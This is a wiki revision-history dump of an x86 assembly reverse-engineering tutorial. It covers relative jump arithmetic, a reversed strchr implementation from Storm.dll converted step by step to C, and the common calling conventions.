<tr><td>90</td><td>nop</td></tr><br />
</table><br />
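<br />
Since the jump and call parameters are relative, working out where a jump lands takes a little arithmetic. The C sketch below shows one way to do it; the function names are invented, and it assumes 32-bit code with no prefixes, where the short forms are 2 bytes long and the e8/e9 forms are 5 bytes long.<br />

```c
#include <stdint.h>

/* Target of a short jump (74 xx, 75 xx, eb xx) located at insn_addr.
   The 8-bit displacement is signed and counted from the next instruction. */
uint32_t short_jump_target(uint32_t insn_addr, uint8_t disp8)
{
    /* Sign-extend the byte by hand: 0xF0 becomes -0x10. */
    int32_t disp = (disp8 & 0x80) ? (int32_t)disp8 - 256 : (int32_t)disp8;

    return insn_addr + 2u + (uint32_t)disp;
}

/* Target of a near jmp/call (e9 or e8 followed by 4 bytes) at insn_addr.
   The displacement is stored little-endian, lowest byte first. */
uint32_t near_jump_target(uint32_t insn_addr, const uint8_t disp[4])
{
    uint32_t d = (uint32_t)disp[0]
               | ((uint32_t)disp[1] << 8)
               | ((uint32_t)disp[2] << 16)
               | ((uint32_t)disp[3] << 24);

    /* Unsigned wrap-around gives the same result as signed addition. */
    return insn_addr + 5u + d;
}
```

For example, "eb fe" jumps to its own address (an infinite loop), because the displacement of -2 cancels out the 2 bytes of the instruction itself.<br />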
<br />
The section on cracking will explain why these opcodes are important.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Assembly_Summary&diff=3151Assembly Summary2012-01-16T02:54:28Z<p>Killboy: /* Simple Instructions */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This pretty much concludes the tutorial on assembly language. The commands and important information needed to do reverse engineering are now behind you; the rest of the sections cover more advanced topics that aren't necessarily required. This makes a good spot to stop and reflect on what has been explained. <br />
<br />
If there is anything here that is confusing, go back to the section and re-read it, look at the examples (which should, more or less, cover everything taught), and if you still don't understand, post a question at the bottom of one of the pages, and I will attempt to clarify. I have attempted not to make assumptions about knowledge, but because I've done so much of this I may take some things for granted, so feel free to question anything that's unclear! <br />
<br />
== Fundamentals ==<br />
To understand assembly well, you must have a firm understanding of the C language, especially the datatypes and pointers. Memory management is also very important! <br />
<br />
== Tools ==<br />
The following sections will use:<br />
* IDA<br />
* WinDbg<br />
* TSearch<br />
* Visual Studio .net<br />
<br />
Additionally, for some examples (mostly hacking stuff, because hacking is more interesting/easier to demonstrate on Linux) I will use these Linux programs:<br />
* gcc<br />
* gdb<br />
<br />
You don't necessarily need all of those, but they will make it easiest to follow. <br />
<br />
== Registers ==<br />
By now, you should hopefully be comfortable with registers. Remember that any general purpose register can be used for anything (with the exception of esp), but they each have common uses.<br />
<br />
== Simple Instructions ==<br />
The instructions from this section are extremely important. They are by far the most common instructions, so knowing them without a reference is vital. For details on all instructions, you can download Intel's free manuals [http://www.intel.com/content/www/us/en/contentlibrary.html here] by searching for 'Architectures Software Developer Manuals'.<br />
<br />
== The Stack ==<br />
Remember that the stack is used for storing temporary data, and is always growing and shrinking. All data below the stack pointer is assumed to be "free", even though it may contain data. The data below the stack pointer is liable to be overwritten and destroyed, though. <br />
<br />
== Functions ==<br />
The main calling conventions are __cdecl, __stdcall, __fastcall, and __thiscall. Often all four are seen in any program. <br />
<br />
An additional convention, __declspec(naked), is used while writing hacks to tell the compiler to allow the programmer to write raw code.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Assembly_Summary&diff=3150Assembly Summary2012-01-16T02:53:58Z<p>Killboy: /* Simple Instructions */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This pretty much concludes the tutorial on assembly language. The commands and important information needed to do reverse engineering are now behind you; the rest of the sections cover more advanced topics that aren't necessarily required. This makes a good spot to stop and reflect on what has been explained. <br />
<br />
If there is anything here that is confusing, go back to the section and re-read it, look at the examples (which should, more or less, cover everything taught), and if you still don't understand, post a question at the bottom of one of the pages, and I will attempt to clarify. I have attempted not to make assumptions about knowledge, but because I've done so much of this I may take some things for granted, so feel free to question anything that's unclear! <br />
<br />
== Fundamentals ==<br />
To understand assembly well, you must have a firm understanding of the C language, especially the datatypes and pointers. Memory management is also very important! <br />
<br />
== Tools ==<br />
The following sections will use:<br />
* IDA<br />
* WinDbg<br />
* TSearch<br />
* Visual Studio .net<br />
<br />
Additionally, for some examples (mostly hacking stuff, because hacking is more interesting/easier to demonstrate on Linux) I will use these Linux programs:<br />
* gcc<br />
* gdb<br />
<br />
You don't necessarily need all of those, but they will make it easiest to follow. <br />
<br />
== Registers ==<br />
By now, you should hopefully be comfortable with registers. Remember that any general purpose register can be used for anything (with the exception of esp), but they each have common uses.<br />
<br />
== Simple Instructions ==<br />
The instructions from this section are extremely important. They are by far the most common instructions, so knowing them without a reference is vital. For details on all instructions, you can download Intel's free manuals [http://www.intel.com/content/www/us/en/contentlibrary.html here] by searching for 'Architectures Software Developers Manuals'.<br />
<br />
== The Stack ==<br />
Remember that the stack is used for storing temporary data, and is always growing and shrinking. All data below the stack pointer is assumed to be "free", even though it may contain data. The data below the stack pointer is liable to be overwritten and destroyed, though. <br />
<br />
== Functions ==<br />
The main calling conventions are __cdecl, __stdcall, __fastcall, and __thiscall. Often all four are seen in any program. <br />
<br />
An additional convention, __declspec(naked), is used while writing hacks to tell the compiler to allow the programmer to write raw code.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Assembly_Summary&diff=3149Assembly Summary2012-01-16T02:41:30Z<p>Killboy: /* Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This pretty much concludes the tutorial on assembly language. The commands and important information needed to do reverse engineering are now behind you; the rest of the sections cover more advanced topics that aren't necessarily required. This makes a good spot to stop and reflect on what has been explained. <br />
<br />
If there is anything here that is confusing, go back to the section and re-read it, look at the examples (which should, more or less, cover everything taught), and if you still don't understand, post a question at the bottom of one of the pages, and I will attempt to clarify. I have attempted not to make assumptions about knowledge, but because I've done so much of this I may take some things for granted, so feel free to question anything that's unclear! <br />
<br />
== Fundamentals ==<br />
To understand assembly well, you must have a firm understanding of the C language, especially the datatypes and pointers. Memory management is also very important! <br />
<br />
== Tools ==<br />
The following sections will use:<br />
* IDA<br />
* WinDbg<br />
* TSearch<br />
* Visual Studio .net<br />
<br />
Additionally, for some examples (mostly hacking stuff, because hacking is more interesting/easier to demonstrate on Linux) I will use these Linux programs:<br />
* gcc<br />
* gdb<br />
<br />
You don't necessarily need all of those, but they will make it easiest to follow. <br />
<br />
== Registers ==<br />
By now, you should hopefully be comfortable with registers. Remember that any general purpose register can be used for anything (with the exception of esp), but they each have common uses.<br />
<br />
== Simple Instructions ==<br />
The instructions from this section are extremely important. They are by far the most common instructions, so knowing them without a reference is vital. For the other hundreds of instructions, find a web reference, or order Intel's free book. A web copy of Intel's book is available [http://www.computer-books.us/assembler.php here]. <br />
<br />
== The Stack ==<br />
Remember that the stack is used for storing temporary data, and is always growing and shrinking. All data below the stack pointer is assumed to be "free", even though it may contain data. The data below the stack pointer is liable to be overwritten and destroyed, though. <br />
<br />
== Functions ==<br />
The main calling conventions are __cdecl, __stdcall, __fastcall, and __thiscall. Often all four are seen in any program. <br />
<br />
An additional convention, __declspec(naked), is used while writing hacks to tell the compiler to allow the programmer to write raw code.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_3&diff=3148Example 32012-01-16T02:23:02Z<p>Killboy: /* Annotated Code */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This example is the implementation of strchr() found in Storm.dll, called SStrChr() (Storm_571). <br />
<br />
Here is the prototype for this function:<br />
char *__stdcall SStrChr(const char *str, int c);<br />
<br />
And the summary of Linux's manpage for what strchr() does:<br />
<pre><br />
The strchr() function locates the first occurrence of c (converted to a<br />
char) in the string pointed to by s. The terminating null character is<br />
considered part of the string; therefore if c is `\0', the functions<br />
locate the terminating `\0'.<br />
</pre><br />
<br />
Below is the code, copied/pasted directly from IDA. The only thing different from IDA is that the addresses have been removed and the jump locations named. It would be a good exercise to use this opportunity to learn IDA a bit. Open "storm.dll" (any Blizzard game should have it) in IDA, go to the function list, and search for Storm_571. <br />
<pre><br />
push ebp<br />
mov ebp, esp<br />
mov eax, [ebp+arg_0]<br />
test eax, eax<br />
jnz short loc_1<br />
<br />
push 57h ; dwErrCode<br />
call ds:SetLastError<br />
xor eax, eax<br />
pop ebp<br />
retn 8<br />
; ---------------------------------------------------------------------------<br />
<br />
loc_1:<br />
mov cl, [eax]<br />
test cl, cl<br />
jz short loc_3<br />
mov dl, [ebp+arg_4]<br />
jmp short loc_2<br />
; ---------------------------------------------------------------------------<br />
<br />
loc_2:<br />
cmp cl, dl<br />
jz short loc_4<br />
mov cl, [eax+1]<br />
inc eax<br />
test cl, cl<br />
jnz short loc_2<br />
<br />
loc_3:<br />
xor eax, eax<br />
<br />
loc_4:<br />
pop ebp<br />
retn 8<br />
</pre><br />
<br />
<br />
== Annotated Code ==<br />
Please, try this yourself first!<br />
<br />
Here, comments have been added explaining each line a little bit. These comments are added in an attempt to understand what the code's doing.<br />
<pre><br />
push ebp ; Preserve ebp.<br />
mov ebp, esp ; Set up the frame pointer.<br />
mov eax, [ebp+arg_0] ; Move the first argument (that IDA has helpfully named) into eax. Recall that the first<br />
; argument is a pointer to the string. <br />
test eax, eax ; Check if the string pointer is 0 (NULL). <br />
jnz short loc_1 ; Jump over the next section if eax is non-zero (presumably, a valid string).<br />
<br />
push 57h ; dwErrCode = ERROR_INVALID_PARAMETER.<br />
call ds:SetLastError ; This library function sets the last error code, which a program can retrieve later. <br />
xor eax, eax ; Clear eax (for a return 0).<br />
pop ebp ; Restore ebp.<br />
retn 8 ; Return, removing both parameters from the stack.<br />
<br />
loc_1:<br />
mov cl, [eax] ; Recall that cl is a 1-byte value at the bottom of ecx. cl gets the character at [eax]<br />
test cl, cl ; Check if the character is '\0' (which indicates the end of the string).<br />
jz short loc_3 ; If it's zero, then the character hasn't been found. Note that this differs from the<br />
; actual strchr() command, since it won't detect the terminator '\0' if c is '\0'. <br />
mov dl, [ebp+arg_4] ; Move the second parameter (named arg_4 by IDA, since it's 4 bytes into the parameter<br />
; list) into dl, which is the right-most byte of edx.<br />
jmp short loc_2 ; Jump down to the next line (the compiler likely did something weird here, optimized <br />
; something out, perhaps).<br />
; ---------------------------------------------------------------------------<br />
<br />
loc_2:<br />
cmp cl, dl ; Compare cl (the current character) to dl (the character being searched for).<br />
jz short loc_4 ; If they're equal, jump down, returning eax (the remaining sub-string).<br />
mov cl, [eax+1] ; Move the next character into cl.<br />
inc eax ; Point eax at the next character.<br />
test cl, cl ; Check if the string terminator has been found.<br />
jnz short loc_2 ; Go to the top of this loop as long as the end of the string hasn't been reached. <br />
<br />
loc_3:<br />
xor eax, eax ; Returns 0, indicating that the character was not found<br />
<br />
loc_4:<br />
pop ebp ; Restore ebp's previous value<br />
retn 8 ; Return, removing 8 bytes (2 32-bit values) from the stack (the two parameters)<br />
</pre><br />
<br />
== C Code ==<br />
This is the assembly directly converted to C. Because of some funny business with jumps, I had to move the loc_4 code up to the "jz loc_4" line. If somebody can think of a more direct way to convert this (without using a goto), I'd like to hear it. <br />
<br />
Note the driver function at the top. It's always important to do whatever you can to test the code; that way, it can be reduced and optimized while confirming that it still works. <br />
<br />
<pre><br />
#include <stdio.h><br />
<br />
/* Prototype */<br />
char *SStrChr(char *str, int c);<br />
<br />
int main(int argc, char *argv[])<br />
{<br />
char *test1 = "abcdefg";<br />
char *test2 = "Hellow World!";<br />
char *test3 = "Final Test!";<br />
<br />
printf("%s: '%s' == '%s'\n", test1, SStrChr(test1, 'c'), "cdefg");<br />
printf("%s: '%s' == '%s'\n", test1, SStrChr(test1, 'a'), "abcdefg");<br />
<br />
printf("%s: '%s' == '%s'\n", test2, SStrChr(test2, 'w'), "w World!");<br />
printf("%s: '%s' == '%s'\n", test2, SStrChr(test2, 'W'), "World!");<br />
<br />
printf("%s: '%s' == '%s'\n", test3, SStrChr(test3, ' '), " Test!");<br />
printf("%s: '%s' == '%s'\n", test3, SStrChr(test3, '!'), "!");<br />
<br />
return 0;<br />
}<br />
<br />
char *SStrChr(char *str, int c)<br />
{<br />
char *eax;<br />
int ebx, ecx, edx, esi, edi, ebp;<br />
<br />
// push ebp ; Preserve ebp.<br />
// mov ebp, esp ; Set up the frame pointer.<br />
// mov eax, [ebp+arg_0] ; Move the first argument (that IDA has helpfully named) into eax. Recall that the first<br />
// ; argument is a pointer to the string.<br />
eax = str;<br />
// test eax, eax ; Check if the string is 0.<br />
// jnz short loc_1 ; Jump over the next section if eax is non-zero (presumably, a valid string).<br />
if(!eax)<br />
{<br />
// push 57h ; dwErrCode = ERROR_INVALID_PARAMETER.<br />
// call ds:SetLastError ; This library function sets the last error code, which a program can retrieve later.<br />
/* No point in setting last error */<br />
// xor eax, eax ; Clear eax (for a return 0).<br />
// pop ebp ; Restore ebp.<br />
// retn 8 ; Return, removing both parameters from the stack.<br />
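return 0;<br />
}<br />
<br />
// loc_1:<br />
// mov cl, [eax] ; Recall that cl is a 1-byte value at the bottom of ecx. cl gets the character at [eax]<br />
ecx = (char) *eax;<br />
// test cl, cl ; Check if the character is '\0' (which indicates the end of the string).<br />
// jz short loc_3 ; If it's zero, then the character hasn't been found.<br />
if(ecx)<br />
{<br />
// mov dl, [ebp+arg_4] ; Move the second parameter into dl, which is the right-most byte of edx.<br />
edx = (char) c;<br />
// jmp short loc_2 ; Jump down to the next line.<br />
// loc_2:<br />
do<br />
{<br />
// cmp cl, dl ; Compare cl (the current character) to dl (the character being searched for).<br />
// jz short loc_4 ; If they're equal, jump down, returning eax (the remaining sub-string).<br />
if(ecx == edx)<br />
return eax; /* The loc_4 code, moved up to here. */<br />
// mov cl, [eax+1] ; Move the next character into cl.<br />
ecx = *(eax + 1);<br />
// inc eax ; Point eax at the next character.<br />
eax++;<br />
// test cl, cl ; Check if the string terminator has been found.<br />
// jnz short loc_2 ; Go to the top of this loop as long as the end of the string hasn't been reached.<br />
}<br />
while(ecx);<br />
}<br />
// loc_3:<br />
// xor eax, eax ; Returns 0, indicating that the character was not found<br />
return 0;<br />
}<br />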
</pre><br />
<br />
== Cleaned up C Code ==<br />
As usual, this is the code with the comments removed and variable names cleaned up (the next example will be interesting, I promise!)<br />
<pre><br />
char *SStrChr(char *str, int c)<br />
{<br />
char *eax;<br />
int ecx, edx;<br />
<br />
eax = str;<br />
if(!eax)<br />
return 0;<br />
<br />
ecx = (char) *eax;<br />
<br />
if(ecx)<br />
{<br />
edx = (char) c;<br />
<br />
do<br />
{<br />
if(ecx == edx)<br />
return eax;<br />
<br />
ecx = *(eax + 1);<br />
eax++;<br />
}<br />
while(ecx);<br />
}<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
<br />
== Reduced C Code ==<br />
I'm going to reduce this code faster than usual, since this code is actually shorter and simpler than other examples. Why wasn't this the first example then? Not sure! <br />
<br />
First, rename variables, and remove some useless variable assignments:<br />
<pre><br />
char *SStrChr(char *str, int c)<br />
{<br />
int thischar;<br />
<br />
if(!str)<br />
return 0;<br />
<br />
thischar = (char) *str;<br />
<br />
if(thischar)<br />
{<br />
do<br />
{<br />
if(thischar == c)<br />
return str;<br />
<br />
str++;<br />
thischar = *str;<br />
}<br />
while(thischar);<br />
}<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Finished Code ==<br />
Finally, an "if" wrapped around a "do..while" loop that tests the same condition is equivalent to a "while" loop, so do that replacement. At the same time, move the assignment into the loop condition (rather than having it in two places). That leaves this function pretty clean:<br />
<pre><br />
char *SStrChr(char *str, int c)<br />
{<br />
char thischar;<br />
<br />
if(!str)<br />
return 0;<br />
<br />
while(thischar = *str)<br />
{<br />
if(thischar == c)<br />
return str;<br />
<br />
str++;<br />
}<br />
<br />
return 0;<br />
}<br />
</pre><br />
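<br />
As noted in the annotated code, this function differs from the standard strchr() when the character being searched for is '\0'. The sketch below makes that visible by comparing the two. SStrChr() is reproduced from the finished code above (with extra parentheses around the assignment to quiet compiler warnings); same_as_strchr() is a helper name invented for this comparison.<br />

```c
#include <stddef.h>
#include <string.h>

/* The finished SStrChr() from above, repeated so this compiles alone. */
char *SStrChr(char *str, int c)
{
    char thischar;

    if(!str)
        return 0;

    while((thischar = *str))
    {
        if(thischar == c)
            return str;

        str++;
    }

    return 0;
}

/* Returns 1 when SStrChr() and the standard strchr() give the same
   answer for this input, and 0 when they disagree. */
int same_as_strchr(char *str, int c)
{
    return SStrChr(str, c) == strchr(str, c);
}
```

For ordinary characters the two agree. For '\0', strchr() returns a pointer to the terminator, while SStrChr() returns 0 because its loop stops before comparing the terminator.<br />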
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3147Functions2012-01-16T02:13:16Z<p>Killboy: /* __fastcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size of the parameters to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with an operand equal to the total size of the parameters in bytes, "ret xx"<br />
<br />
Here's an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''). <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0Ch ; The function cleans up the stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
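<br />
Reading the parameter count off the return instruction can be sketched in C as follows. The function name is invented, and the sketch assumes 32-bit code in which every parameter occupies exactly one 4-byte stack slot, which is not true for 64-bit values or for structures passed by value.<br />

```c
#include <stdint.h>

/* Given a pointer to the bytes of a return instruction, estimates how
   many 4-byte parameters the function removes from the stack.
   Returns -1 if the bytes are not a near "ret" at all. */
int stdcall_param_count(const uint8_t *ret_insn)
{
    if (ret_insn[0] == 0xC3)
        return 0; /* plain "ret": nothing is cleaned up by the callee */

    if (ret_insn[0] == 0xC2) {
        /* "ret xxxx": 16-bit little-endian byte count follows the opcode */
        unsigned bytes = (unsigned)ret_insn[1] | ((unsigned)ret_insn[2] << 8);
        return (int)(bytes / 4u);
    }

    return -1;
}
```

A result of 0 only says that the function itself removes nothing; it could still be a ''__cdecl'' function whose caller cleans up the parameters.<br />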
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans up the stack. <br />
</pre><br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall''<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific convention, can't really be identified in assembly, since it's identical to __cdecl once it reaches assembly. However, the special property of this convention is that the compiler will generate no code of its own in the function. This allows the programmer, in a __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the function from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3146Functions2012-01-16T02:11:32Z<p>Killboy: /* __stdcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size of the parameters to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with an operand equal to the total size of the parameters in bytes, "ret xx"<br />
<br />
Here's an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''): <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0Ch ; The function cleans up the stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
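<br />
As a rough illustration of that idea, the sketch below converts the operand of a "ret xx" instruction into a parameter count. The function name is hypothetical, and it assumes 32-bit code in which every parameter occupies exactly one 4-byte stack slot; larger arguments (64-bit integers, doubles, structures passed by value) take more than one slot, so the result is really a count of stack slots.<br />

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: given the operand of "ret xx" in a __stdcall
 * function, return how many 4-byte stack slots the callee removes.
 * Assumption: 32-bit x86, one slot per parameter. */
uint32_t stdcall_param_count(uint16_t ret_operand)
{
    /* The operand is a byte count, so it should be a multiple of 4. */
    assert(ret_operand % 4 == 0);
    return ret_operand / 4u;
}
```

For the example above, stdcall_param_count(0x0C) gives 3, matching the three pushes before the call.<br />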
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans itself up. <br />
</pre><br />
<br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall''<br />
* The function cleans itself up, the same as ''__stdcall''<br />
<br />
Here is an example of __thiscall:<br />
<pre><br />
push param3<br />
push param2<br />
push param1<br />
mov ecx, this<br />
call func<br />
...<br />
func:<br />
...<br />
ret 12<br />
</pre><br />
<br />
== __declspec(naked) ==<br />
''__declspec(naked)'', a Visual Studio-specific attribute rather than a true calling convention, can't really be identified in assembly, since the calling convention itself is unchanged (''__cdecl'' by default). Its special property is that the compiler generates no prologue or epilogue code for the function. This allows the programmer, in an __asm{} block, to write everything from preserving registers to allocating local variables and returning. This is useful when patching a jump in the middle of code, since it prevents the compiler from changing registers without the programmer's knowledge. <br />
<br />
This C function:<br />
void __declspec(naked) test()<br />
{<br />
}<br />
<br />
Would translate to this in assembly:<br />
<pre></pre><br />
<br />
Since no code is generated. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Functions&diff=3145Functions2012-01-16T02:10:02Z<p>Killboy: /* __stdcall */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
The previous section about the stack has shown how to call a standard function with parameters. This section will go over some other "calling conventions" besides the standard. <br />
<br />
A "calling convention" is the way in which a function is called. The standard convention, ''__cdecl'', is what has been used up until now. Some other common ones are ''__stdcall'', ''__fastcall'', and ''__thiscall''. <br />
<br />
A less common declaration used when writing hacks is ''__declspec(naked)''. <br />
<br />
== __cdecl ==<br />
''__cdecl'' is the default calling convention on most C compilers. The properties are as follows:<br />
* The caller places all the parameters on the stack<br />
* The caller removes the parameters from the stack (often by adding the total size of the parameters to the stack pointer)<br />
<br />
Throughout previous sections, ''__cdecl'' has been the calling convention used. However, here is an example to help illustrate it:<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
add esp, 0Ch ; Parameters are removed from the stack<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
== __stdcall ==<br />
''__stdcall'' is another common calling convention. The properties of ''__stdcall'' are:<br />
* The caller places parameters on the stack<br />
* The called function removes the parameters from the stack, often by using the return instruction with an operand equal to the total size of the parameters in bytes, "ret xx"<br />
<br />
Here's an example of a ''__stdcall'' function (note that if no parameters are passed, ''__stdcall'' is indistinguishable from ''__cdecl''): <br />
<br />
<pre><br />
push param3<br />
push param2<br />
push param1 ; Parameters are pushed onto the stack<br />
call func ; The function is called<br />
... <br />
func:<br />
...<br />
ret 0Ch ; The function cleans up its own stack<br />
</pre><br />
<br />
The most useful part about ''__stdcall'' is that it tells a reverse engineer how many parameters are passed to any given function. In cases where no examples of the function being called may be found (possibly because it's an exported .dll function), it is easier to check the return than to enumerate local variables (of course, IDA looks after that automatically if that's an option).<br />
<br />
== __fastcall ==<br />
''__fastcall'' is the final common calling convention seen. All implementations of ''__fastcall'' pass parameters in registers, although Microsoft and Borland, for example, use different registers. Here are the properties of Microsoft's ''__fastcall'' implementation:<br />
* First two parameters are passed in ecx and edx, respectively<br />
* Third parameter and on are passed on the stack, as usual<br />
* Functions clean up their own stack, if necessary<br />
<br />
Recognizing a ''__fastcall'' function is easy: look for ecx and edx being used without being initialized in a function. <br />
<br />
A ''__fastcall'' with no parameters is identical to ''__cdecl'' and ''__stdcall'' with no parameters, and a ''__fastcall'' with a single parameter looks like ''__thiscall''. <br />
<br />
Here are some __fastcall examples:<br />
<pre><br />
mov ecx, 7<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
call func<br />
...<br />
func:<br />
...<br />
ret<br />
</pre><br />
<br />
<pre><br />
mov ecx, 7<br />
mov edx, 8<br />
push param4<br />
push param3<br />
call func<br />
...<br />
func:<br />
...<br />
ret 8 ; Note that the function cleans itself up. <br />
</pre><br />
<br />
<br />
== __thiscall ==<br />
Seen only in object-oriented programming, ''__thiscall'' is very similar to ''__stdcall'', except that a pointer to the class whose member is being called is passed in ecx. <br />
* ecx is assigned a pointer to the class whose member is being called<br />
* The parameters are placed on the stack, the same as ''__stdcall''<br />
